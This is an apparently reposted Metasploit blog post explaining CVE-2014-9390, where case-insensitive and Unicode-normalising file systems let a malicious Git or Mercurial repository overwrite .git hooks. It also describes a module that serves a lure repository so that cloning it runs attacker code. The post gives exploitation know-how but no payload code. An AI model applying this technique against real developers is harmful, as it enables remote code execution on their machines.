COMMIT_EDITMSG ? ??? config ? ??? description ? ??? HEAD ? ??? hooks ? ? ??? applypatch-msg.sample ? ? ??? commit-msg.sample ? ? ??? post-update.sample ? ? ??? pre-applypatch.sample ? ? ??? pre-commit.sample ? ? ??? prepare-commit-msg.sample ? ? ??? pre-rebase.sample ? ? ??? update.sample ? ??? index ? ??? info ? ? ??? exclude ? ??? logs ? ? ??? HEAD ? ? ??? refs ? ? ??? heads ? ? ??? master ? ??? objects ? ? ??? 1c ? ? ? ??? 8fe13acf2178ea5130480625eef83a59497cb0 ? ? ??? 4b ? ? ? ??? 825dc642cb6eb9a060e54bf8d69288fbee4904 ? ? ??? e5 ? ? ? ??? 58a44cf7fca31e7ae5f15e370e9a35bd1620f7 ? ? ??? fb ? ? ? ??? 19d8e1e5db83b4b11bbd7ed91e1120980a38e0 ? ? ??? info ? ? ??? pack ? ??? refs ? ??? heads ? ? ??? master ? ??? tags ??? test.txt Similarly, for Mercurial: $ hg init blah $ tree -a blah blah ??? .hg ??? 00changelog.i ??? requires ??? store 2 directories, 2 files $ cd blah $ date > test.txt && hg add test.txt && hg commit -m "Add test.txt" $ hg log changeset: 0:ea7dac4a11f0 tag: tip user: Jon Hart date: Wed Dec 31 09:25:07 2014 -0800 summary: Add test.txt $ tree -a . . ??? .hg ? ??? 00changelog.i ? ??? cache ? ? ??? branch2-served ? ??? dirstate ? ??? last-message.txt ? ??? requires ? ??? store ? ? ??? 00changelog.i ? ? ??? 00manifest.i ? ? ??? data ? ? ? ??? test.txt.i ? ? ??? fncache ? ? ??? phaseroots ? ? ??? undo ? ? ??? undo.phaseroots ? ??? undo.bookmarks ? ??? undo.branch ? ??? undo.desc ? ??? undo.dirstate ??? test.txt These directories (.git, .hg) are created by a client when the repository is initially created or cloned. The contents of these directories can be modified by users to, for example, configure repository options (.git/config for Git, .hg/hgrc for Mercurial), and are routinely modified by Git and Mercurial clients as part of normal operations on the repository. Simplified, the .hg and .git directories contain everything necessary for the repository to operate, and everything outside of these directories is considered is considered part of the working directory, namely the contents of the repository itself (test.txt in my simplified examples). Want to learn more? Git Basics and Understanding Mercurial are great resources. During routine repository operations such as cloning, updating, committing, etc, the repository working directory is updated to reflect the current state of the repository. Using the examples from above, upon cloning either of these repositories, the local clone of the repository would be updated to reflect the current state of test.txt. This is where the trouble begins. Both Git and Mercurial clients have had code for a long time that ensures that no commits are made to anything in the .git or .hg directories. Because these directories control client side behavior of a Git or Mercurial repository, if they were not protected, a Git or Mercurial server could potentially manipulate the contents of certain sensitive files in the repository that could cause unexpected behavior when a client performs certain operations on the repository. Unfortunately these sensitive directories were not properly protected in all cases. Specifically: On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. While a commit to a file under .git (all lower case) would be blocked, a commit to .giT (partially lower case) would not be blocked and would result in .git being modified because .git is equivalent to .giT on a case-insensitive file system. These same Git clients as well as Mercurial versions before 3.2.3 have a nearly identical vulnerability that affects HFS+ file systems (OS X and Windows) where certain Unicode codepoints are ignored in file names. Mercurial before 3.2.3 on Windows has a nearly identical vulnerability on Windows only where MS-DOS file "short names" or 8.3 formats are possible. Basic exploitation of the first vulnerability is fairly simple to do with basic Git commands as I described in #4435, and the commits that fix the second and third vulnerabilities show simple examples of how to exploit it. But basic exploitation is boring so in #4440 I've spiced things up a bit. As currently written, this module exploits the first of these three vulnerabilities by launching an HTTP server designed to simulate a Git repository accessed over HTTP, which is one of the most common ways to interact with Git. Upon cloning this repository, vulnerable clients will be convinced to overwrite Git hooks, which are shell scripts that get executed when certain operations happen (committing, updating, checkout, etc). By default, this module overwrites the .git/hooks/post-checkout script which is executed upon completion of a checkout, which conveniently happens at clone time so the simple act of cloning a repository can allow arbitrary code execution on the Git client. It goes a little bit further and provides some simplistic HTML in the hopes of luring in potentially vulnerable clients: And, if you clone it, it only looks mildly suspicious: $ git clone http://10.0.1.18:8080/ldf.git Cloning into 'ldf'... $ cd ldf $ git log commit 858597e39d8a5d8e3511d404bcb210948dc835ae Author: Deborah Phillips Date: Thu Apr 29 17:44:02 2004 -0500 Initial commit to open git repository for nf.tygzxwf.xnk0lycynl.org! The module has the beginnings of support for the second and third vulnerabilities, so this particular #haxmas gift may need some work by you, the Metasploit community. Enjoy! Sursa: https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial
×
×
  • Create New...